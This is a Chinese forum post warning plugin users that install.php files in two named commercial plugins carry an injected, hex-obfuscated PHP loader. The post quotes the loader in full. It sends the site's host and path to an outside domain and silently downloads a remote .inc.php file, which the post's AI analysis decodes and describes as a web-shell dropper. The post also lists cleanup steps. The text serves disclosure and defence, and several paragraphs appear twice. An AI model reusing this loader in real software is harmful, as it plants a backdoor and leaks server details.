应用中心某些正版插件热门插件的目录的install.php安装脚本文件非法注入外链请注意
2025/04/15 20:04:54
应用中心某些正版插件热门插件的目录的install.php安装脚本文件非法注入外链请注意:
你们谁是正版的插件最近更新过的自行检查审查下插件目录中的 install.php 文件是否包含下面代码片段:
目前已发现:
可可积分商城兑换交易 107.250402版本的 keke_integralmall\install.php (时间线 2025.04.02)
[点微]同城分类信息 40.5 版本的 \tom_tongcheng\install.php (时间线 2025.03.31)
其他正在陆续补充中~【并不是存在每日的更新清单中,而是特定热门插件,还在分析是故意为止,还是有特定目标判断写入。】
建议有正版应用的,最近也检查查看下你们购买下载过的插件 没有自删除完成的 该插件目录中的安装脚本文件 install.php 这个文件:
在 install.php 头部 插入了可疑代码:【但是毕竟是应用中心官方,还是可可正版,还有其他热门插件目标,由于正版插件都是安装完后自删除 install.php,所以普通站长很难捕捉和发现,这个触发只在新购买新安装才会中招~ ,估计下个可可 积分商城兑换交易的版本就会覆盖掉这次的捕捉内容~,无法理解这种代码怎么会被审核通过的~ 由于没有第二例站点作为举证,仅作记录,事情重大,请勿扩散宣传~ 毕竟这涉及平台和可可大佬,不能得罪!】
AI解析为:
3. 下载远程文件
你们谁是正版的插件最近更新过的自行检查审查下插件目录中的 install.php 文件是否包含下面代码片段:
目前已发现:
可可积分商城兑换交易 107.250402版本的 keke_integralmall\install.php (时间线 2025.04.02)
[点微]同城分类信息 40.5 版本的 \tom_tongcheng\install.php (时间线 2025.03.31)
其他正在陆续补充中~【并不是存在每日的更新清单中,而是特定热门插件,还在分析是故意为止,还是有特定目标判断写入。】
建议有正版应用的,最近也检查查看下你们购买下载过的插件 没有自删除完成的 该插件目录中的安装脚本文件 install.php 这个文件:
在 install.php 头部 插入了可疑代码:【但是毕竟是应用中心官方,还是可可正版,还有其他热门插件目标,由于正版插件都是安装完后自删除 install.php,所以普通站长很难捕捉和发现,这个触发只在新购买新安装才会中招~ ,估计下个可可 积分商城兑换交易的版本就会覆盖掉这次的捕捉内容~,无法理解这种代码怎么会被审核通过的~ 由于没有第二例站点作为举证,仅作记录,事情重大,请勿扩散宣传~ 毕竟这涉及平台和可可大佬,不能得罪!】
- $randomstr = hex2bin('76657273696f6e5f').bin2hex(random_bytes(2)).hex2bin('2e696e632e706870');
- $abcdurl = hex2bin('68747470733a2f2f622e6265747465726c696665737570706c792e636f6d2f76312e7068703f7077643d') . bin2hex(random_bytes(2)) . hex2bin('2675726c3d') . bin2hex($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']) . hex2bin('2666696c653d').$randomstr. hex2bin('26706174683d').dirname(__FILE__);
- $optionstime = [
- 'http' => [
- 'timeout' => 30
- ]
- ];
- $contextstr = stream_context_create($optionstime);
- @copy($abcdurl,dirname(__FILE__).'/'.$randomstr,$contextstr);
这段PHP代码的主要功能是构造一个特定的URL,从远程服务器下载文件并保存到本地,可能用于恶意目的。以下是对代码的详细分析:
1. 生成随机文件名 ($randomstr)- $randomstr = hex2bin('76657273696f6e5f').bin2hex(random_bytes(2)).hex2bin('2e696e632e706870');
- hex2bin('76657273696f6e5f') 转换为字符串 "version_"
- random_bytes(2) 生成2字节的随机数据,转换为十六进制(4字符)
- hex2bin('2e696e632e706870') 转换为 ".inc.php"
- 结果示例:version_ab12.inc.php(随机部分每次不同)
- $abcdurl = hex2bin('68747470733a2f2f622e6265747465726c696665737570706c792e636f6d2f76312e7068703f7077643d')
- . bin2hex(random_bytes(2))
- . hex2bin('2675726c3d')
- . bin2hex($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'])
- . hex2bin('2666696c653d').$randomstr
- . hex2bin('26706174683d').dirname(__FILE__);
- 基础URL:https://b.betterlifesupply.com/v1.php?pwd=
- pwd= 参数值为2字节随机数的十六进制(如 a1b2)
- 附加参数:
- &url= + 当前访问URL的十六进制编码(包含主机和路径)
- &file= + 生成的随机文件名(如 version_ab12.inc.php)
- &path= + 当前脚本的目录路径
完整URL示例:
- https://b.betterlifesupply.com/v1.php?pwd=a1b2&url=656e637279707465642d6578616d706c652e636f6d2f746573742e706870&file=version_ab12.inc.php&path=/var/www/html
3. 下载远程文件
- $optionstime = ['http' => ['timeout' => 30]];
- $contextstr = stream_context_create($optionstime);
- @copy($abcdurl, dirname(__FILE__).'/'.$randomstr, $contextstr);
- 超时设置:30秒
- 静默复制:使用@抑制错误,将远程文件(由v1.php生成)保存到本地,文件名如version_ab12.inc.php
- 数据泄露:
- 收集服务器信息(HTTP_HOST, REQUEST_URI, 文件路径)
- 发送到攻击者控制的域名 betterlifesupply.com
- 远程代码执行:
- 下载的 .inc.php 文件可能包含后门代码
- 攻击者可通过访问该文件执行任意命令
- 隐蔽性手段:
- 使用十六进制编码混淆关键字符串
- 随机文件名避免重复覆盖
- 超时设置防止长时间阻塞
- 攻击者交互:
- pwd 参数可能与文件名中的随机部分对应,用于标识不同受害者
- 远程服务器可能根据参数返回定制化的恶意代码
- 立即删除:检查服务器上所有类似代码片段
- 排查文件:查找非常规的 .inc.php 文件(如 version_*.inc.php)
- 域名封锁:禁止访问 betterlifesupply.com
- 日志分析:检查是否有异常请求到可疑URL
- 漏洞修复:排查可能的入侵途径(如未更新的CMS漏洞)
该代码具有典型Web Shell特征,可能是服务器已被入侵的标志,需要全面安全审计。